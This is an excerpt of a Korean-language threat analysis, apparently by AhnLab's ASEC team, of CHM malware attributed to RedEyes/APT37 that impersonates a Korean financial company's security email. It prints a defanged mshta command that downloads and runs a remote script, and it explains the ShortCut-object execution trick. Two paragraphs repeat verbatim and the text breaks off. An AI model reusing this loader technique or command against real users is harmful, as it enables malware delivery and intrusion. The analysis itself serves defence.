국내 금융 기업 보안 메일을 사칭한 CHM 악성코드 : RedEyes(ScarCruft)
Contents
ASEC(AhnLab Security Emergency response Center) 분석팀은 RedEyes 공격 그룹(also known as APT37, ScarCruft) 이 제작한 것으로 추정되는 CHM 악성코드가 국내 사용자를 대상으로 유포되고 있는 정황을 포착하였다. 지난 2월에 소개한 RedEyes 그룹의 M2RAT 악성코드 공격 과정 중 “2.3. 지속성 유지 (Persistence)” 과정에서 사용된 명령어가 이번 공격에서도 동일한 형태로 사용된 것을 확인하였다. 해당 정보를 포함한 CHM 악성코드의 상세한 동작 과정은 아래에서 소개한다.
CHM 파일 실행 시, 국내 금융 기업의 보안 메일을 사칭한 도움말 창을 생성한다. 이때 CHM 내부에 존재하는 악성 스크립트가 동작하며 사용자는 해당 과정을 알아차리기 힘들다. 이러한 특징을 이용하여 최근 CHM 을 이용한 악성코드 유포가 증가하고 있다.
실행되는 악성 스크립트는 아래와 같으며, 이전에 소개된 CHM 악성코드들과 동일하게 바로가기 객체(ShortCut)를 이용하였다. 바로가기 객체는 Click 메서드를 통해 호출되며 Item1 항목에 존재하는 명령어가 실행된다. 해당 파일에서는 mshta 프로세스를 통해 특정 url 에 존재하는 추가 스크립트를 실행하게 된다.
- 실행 명령어
mshta.exe hxxp://shacc[.]kr/skin/product/1.html
mshta 프로세스를 통해 실행되는 “1.html” 파일에는 JS(JavaScript) 코드가 포함되어 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 …
CHM 파일 실행 시, 국내 금융 기업의 보안 메일을 사칭한 도움말 창을 생성한다. 이때 CHM 내부에 존재하는 악성 스크립트가 동작하며 사용자는 해당 과정을 알아차리기 힘들다. 이러한 특징을 이용하여 최근 CHM 을 이용한 악성코드 유포가 증가하고 있다.
실행되는 악성 스크립트는 아래와 같으며, 이전에 소개된 CHM 악성코드들과 동일하게 바로가기 객체(ShortCut)를 이용하였다. 바로가기 객체는 Click 메서드를 통해 호출되며 Item1 항목에 존재하는 명령어가 실행된다. 해당 파일에서는 mshta 프로세스를 통해 특정 url 에 존재하는 추가 스크립트를 실행하게 된다.
- 실행 명령어
mshta.exe hxxp://shacc[.]kr/skin/product/1.html
mshta 프로세스를 통해 실행되는 “1.html” 파일에는 JS(JavaScript) 코드가 포함되어 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 …